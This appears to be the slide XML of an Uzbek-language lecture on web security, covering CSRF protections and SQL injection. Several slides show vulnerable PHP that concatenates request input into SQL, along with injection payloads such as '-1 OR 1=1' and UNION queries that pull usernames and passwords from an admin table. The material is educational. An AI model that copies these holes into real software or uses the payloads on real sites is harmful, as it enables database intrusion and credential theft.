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9" r:id="rId3"/>
    <p:sldId id="261" r:id="rId4"/>
    <p:sldId id="262" r:id="rId5"/>
    <p:sldId id="263" r:id="rId6"/>
    <p:sldId id="264" r:id="rId7"/>
    <p:sldId id="275" r:id="rId8"/>
    <p:sldId id="276" r:id="rId9"/>
    <p:sldId id="265" r:id="rId10"/>
    <p:sldId id="266" r:id="rId11"/>
    <p:sldId id="267"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8664"/>
    <a:srgbClr val="657355"/>
    <a:srgbClr val="A44661"/>
    <a:srgbClr val="9933FF"/>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0889A3-BD08-4446-B77D-8047CDAF5C1C}" type="datetimeFigureOut">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>30.01.2023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0B08A2-91BD-4030-AB01-7E9B288F4FB3}"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06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0889A3-BD08-4446-B77D-8047CDAF5C1C}" type="datetimeFigureOut">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>30.01.2023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9500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0889A3-BD08-4446-B77D-8047CDAF5C1C}" type="datetimeFigureOut">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>30.01.2023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353054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0889A3-BD08-4446-B77D-8047CDAF5C1C}" type="datetimeFigureOut">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>30.01.2023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40615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0889A3-BD08-4446-B77D-8047CDAF5C1C}" type="datetimeFigureOut">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>30.01.2023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0B08A2-91BD-4030-AB01-7E9B288F4FB3}"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74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0889A3-BD08-4446-B77D-8047CDAF5C1C}" type="datetimeFigureOut">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>30.01.2023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143220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0889A3-BD08-4446-B77D-8047CDAF5C1C}" type="datetimeFigureOut">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>30.01.2023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114041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0889A3-BD08-4446-B77D-8047CDAF5C1C}" type="datetimeFigureOut">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>30.01.2023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167283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0889A3-BD08-4446-B77D-8047CDAF5C1C}" type="datetimeFigureOut">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>30.01.2023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358439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0889A3-BD08-4446-B77D-8047CDAF5C1C}" type="datetimeFigureOut">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>30.01.2023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0B08A2-91BD-4030-AB01-7E9B288F4FB3}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="384339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0889A3-BD08-4446-B77D-8047CDAF5C1C}" type="datetimeFigureOut">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>30.01.2023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0B08A2-91BD-4030-AB01-7E9B288F4FB3}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="ru-RU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="224670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0889A3-BD08-4446-B77D-8047CDAF5C1C}" type="datetimeFigureOut">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>30.01.2023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0B08A2-91BD-4030-AB01-7E9B288F4FB3}"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8590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algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="8800" b="1" smtClean="0"/>
              <a:t>Xavfsizlik</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="8800" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Подзаголовок 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1100051" y="4455620"/>
            <a:ext cx="10058400" cy="1796899"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:endParaRPr lang="en-US" cap="none" smtClean="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:endParaRPr lang="en-US" cap="none">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" cap="none" spc="-50" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Maxarov Q.T.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2600" cap="none" spc="-50">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2438579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Cross Site Request Forgery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Himoyalanish:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Serverdagi berilganlarni o'zgartiruvchi barcha so'rovlar, shuningdek personal ma'lumotlarni va juda muhim ma'lumotlarni qaytaruvchi so'rovlar ham </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>himoyalanishi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>kerak.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Oddiy usullardan biri bunday so'rovlarni alohida tasdiqlashni talab qilish.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Yana bir keng tarqalgan usullardan biri – foydalanuvchining har bir sessiyasiga so'rovlarni bajarish uchun mahfiy unikal kalit belgilash va bu kalitni serverda so'rovni amalga oshirishdan oldin tekshirish.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2621181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SQL-Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1845733"/>
            <a:ext cx="10058400" cy="4589573"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>SQL kodni amalga oshirish (SQL-Inyeksiya). Bunda buzg'unchi berilganlar bazasiga bo'layotgan so'rovlarga qo'shimcha SQL so'rovlarni ulash orqali bazadan maxfiy ma'lumotlarni olish imkoniga ega bo'ladi.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Bunday hujum SQL so'rovlarni qurishda kiruvchi berilganlarni noto'g'ri qayta ishlash natijasida yuzaga keladi. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Masalan, quyidagi php kod bo'lsin:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$id = $_REQUEST['id'];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$res = mysqli_query("SELECT * FROM news WHERE id_news = " . $id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Ushbu kod yozilgan sahifaga quyidagi manzil orqali kirilsa: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>example.org/script.php?id=5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SELECT * FROM news WHERE id_news = 5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>so'rovi bajariladi. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Agar quyidagi manzil bilan kirilsa:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t> http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1"/>
              <a:t>://example.org/script.php?id=-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>1+OR+1=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SELECT * FROM news WHERE id_news = -1 OR 1=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="000000">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:srgbClr>
                </a:solidFill>
              </a:rPr>
              <a:t>so'rovi bajariladi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:srgbClr>
                </a:solidFill>
              </a:rPr>
              <a:t>. Ikkinchi holatda id_news = -1 bo'lgan yangilik bo'lmasa ham 1=1 sharti rost qiymat qaytargani uchun bazadagi barcha yangiliklar natija sifatida qaytariladi.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="325715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SQL-Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1845734"/>
            <a:ext cx="10058400" cy="4520560"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>Satrli parametrlarda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>SQL-Inyeksiya:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$search_text = $_REQUEST['search_text'];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$res = mysqli_query("SELECT id_news, news_date, news_caption, news_text, news_id_author</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                      FROM news WHERE news_caption LIKE('%$search_text%')");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Kutilgan qiymat:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t> Test</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SELECT id_news, news_date, news_caption, news_text, news_id_author FROM news </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  WHERE news_caption LIKE('%Test%')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>SQL-inyeksiya amalga oshiruvchi qiymat:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t> ')+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1"/>
              <a:t>and+(news_id_author='1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SELECT id_news, news_date, news_caption, news_text, news_id_author FROM news </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  WHERE news_caption LIKE('%') and (news_id_author='1%')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="317413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SQL-Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1845734"/>
            <a:ext cx="10058400" cy="4520560"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> orqali SQL-Inyeksiya:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$res = mysqli_query("SELECT id_news, header, body, author FROM news WHERE id_news = " . $_REQUEST['id']);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Parametr sifatida: -1 UNION SELECT 1,username, password,1 FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SELECT id_news, header, body, author FROM news WHERE id_news = -1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SELECT 1,username,password,1 FROM admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Bu holatda buzg'unchi admin jadvalidan foydalanuvchilar nomlari va parollarini olish imkoniga ega bo'ladi.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33305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SQL-Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1845734"/>
            <a:ext cx="10058400" cy="4520560"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Ayrim holatlarda o'zgaruvchidan keyin SQL so'rovning davomi bo'lishi mumkin. Masalan:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$res = mysqli_query("SELECT author FROM news WHERE id=" . $_REQUEST['id'] . " AND author LIKE ('a%')");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Bunday holatda SQL-Inyeksiyani amalga oshirish uchun buzg'unchilar izohni aniqlovchi belgilardan foydalanishi mumkin (/* yoki -- belgilari, BBBT turiga bog'liq).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>id o'zgaruvchiga qiymat sifatida quyidagi jo'natiladi: -1 UNION SELECT password FROM admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>/*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Buzilgan sql so'rov quyidagi ko'rinishda bo'ladi:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SELECT author FROM news WHERE id=-1 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>UNION SELECT password FROM admin/* AND author LIKE ('a%')</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="170142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SQL-Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1845734"/>
            <a:ext cx="10058400" cy="4520560"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Buzg'unchilar SQL so'rovni ajratishlari ham mumkin (; belgisi yordamida). Masalan:</a:t>
            </a:r>
          </a:p>
          <a:p>
